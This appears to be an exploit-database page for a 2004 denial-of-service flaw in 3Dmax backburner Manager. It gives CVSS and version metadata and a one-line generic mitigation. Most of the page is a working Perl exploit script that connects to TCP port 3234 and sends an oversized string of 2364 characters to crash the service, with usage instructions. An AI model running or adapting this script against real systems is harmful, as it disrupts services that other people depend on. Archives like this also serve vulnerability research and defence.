header-logo
Suggest Exploit
vendor:
backburner Manager
by:
Xtiger
5.5
CVSS
MEDIUM
Denial of Service (Dos)
400
CWE
Product Name: backburner Manager
Affected Version From: 3dmax 5.0 backburner Manager Version 2.0
Affected Version To: 3dmax 6.0 SP1 backburner Manager Version 2.2
Patch Exists: NO
Related CWE:
CPE: a:3dmax:backburner_manager:2.0
Metasploit:
Other Scripts:
Platforms Tested: Windows
2004

3Dmax backburner Manager Dos Exploit

There is a security hole in the 3Dmax backburner Manager where the default listen port is 3234. It can be exploited by sending a long string, causing a denial of service.

Mitigation:

Apply the latest security patches and updates provided by the vendor.
Source

Exploit-DB raw data:

#3Dmax backburner Manager Dos Exploit
#There are security hole in 3Dmax backburner Manager Default listen port is 3234.
#It's can be Dos by long string

#Tested on Version
#3dmax 5.0 backburner Manager Version 2.0
#3dmax 6.0 backburner Manager Version 2.2
#3dmax 6.0 SP1 backburner Manager Version 2.2
#All Windows OS

#Found By Xtiger -->www.Xtiger.net&www.ThySea.com
#Code by Xtiger coolsumer@163.com
#Reference:  http://jishu.thysea.com/index.php?modules=show&id=10327
----------------------------------------------------------------
#!C:\perl\bin\perl.exe

use IO::Socket;

my $progname = $0;
$progname =~ s,.'*/,,;
$progname =~ s/\.\w*$//;

$host = shift || 'localhost';
$port = shift || '3234';
$title = " =============================================\n‖ 3Dmax backburner Manager Dos Exploit 1.0! ‖\n =============================================\n  BY tiger---www.Xtiger.net&www.ThySea.com\n";
$Usage = "  Usage: $progname [Host] [port](default is 3234)\n";

if ($host > 0){
   dos();
}
else  {
   usage();
}

sub dos
{
my $socket = IO::Socket::INET->new ( Proto => "tcp",
PeerAddr => $host,
PeerPort => $port,
)
or print "$title  [*] ERR-->can't connect to $host:$port! :(\n" and exit;
print ($title, "[*] connected to $host:$port\n");
print "[*] Sending string...\n";

print $socket ("?"x(2364),"\r\n") or die "$title  [*] ERR-->Sending string failed! :(\n";
print "[*] maybe crashed!\n";

$socket->close;
}

sub usage
{
   die $title,$Usage;
}

# milw0rm.com [2004-11-28]